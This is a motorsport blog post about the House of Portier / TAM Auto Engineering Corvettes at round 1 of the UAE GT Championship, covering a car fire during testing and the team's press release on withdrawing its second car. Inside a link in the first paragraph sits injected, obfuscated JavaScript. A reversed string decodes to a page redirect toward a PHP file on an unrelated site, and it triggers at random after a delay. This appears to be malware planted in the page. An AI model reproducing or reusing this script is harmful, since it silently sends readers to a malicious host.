After following the House of Portier / TAM Auto Engineering team’s preparations for the CYTECH UAE GT Championship over the summer – be sure to check out our exclusive $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/20101340/video-tam-house-of-portier-uae-gt-pre-season/”>video if you haven’t already – I was extremely interested to see both cars out on track for the opening round. With last year’s championship-winning car, plus the newcomer in GTB, TAM were all set to feature strongly.

However, it was not meant to be as the GTA ‘Vette caught fire during pre-race day testing as Karim Al Azhari was making his way down the main straight at the Dubai Autodrome. There were plenty of worried faces all along the pitlane as nobody was exactly sure what had happened. Thankfully, Karim had got out of the car unharmed and was quickly whisked back to the pits in the medical car, and the fire was soon brought under control by the guys at the Autodrome.

The TAM guys are currently investigating what happened and as a precaution withdrew their GTB class ‘Vette from the weekend’s race. The GTB car had been running great with Mohammed Al Mutawaa really starting to gel with the car – it’s certainly a big jump from the Renault Clio he used to race!

We wish Motaz and all the guys at House of Portier / TAM Auto Engineering the best of luck getting the cars back to fighting fitness for the next race.

Official press release is as follows:

Statement from House of Portier / TAM Auto Engineering regarding Round 1 of the UAE GT Championship

During free testing before the opening round of the CYTECH UAE CT Championship, the House of Portier / TAM Auto Engineering Corvette running in the GTA class suffered a fire whilst driving along the main straight of the Dubai Autodrome. Driver Karim Al Azhari was able to safely bring the car to a stop and evacuate from the vehicle unharmed. The cause of the fire is currently under investigation by the HoP / TAM technical team.

As a result of the technical issue with the GTA car, House of Portier / TAM Auto Engineering owners and management took the decision to voluntarily withdraw its GTB class Corvette from the race weekend. The safety of its drivers is paramount and HoP / TAM has chosen not to run until the cause of the technical issue is resolved.

Team Manager for House of Portier / TAM Auto Engineering, Motaz Abu-Hijleh, said. ‘It’s not an ideal way to start the season, but the safety of our drivers is our number one priority. Whilst we would have liked to have competed with both cars this weekend, we have decided not to run until we have fully investigated the technical issue with our GTA car. Our young Emirati driver, Mohammed Al Mutawaa, was looking forward to his first race in the GTB Corvette, but understands the team’s decision.’

House of Portier / TAM Auto Engineering hopes to have both Corvettes ready to take to the track in time for Round 2 of the CYTECH UAE GT Championship which takes place at the Dubai Autodrome on November 4th/5th.
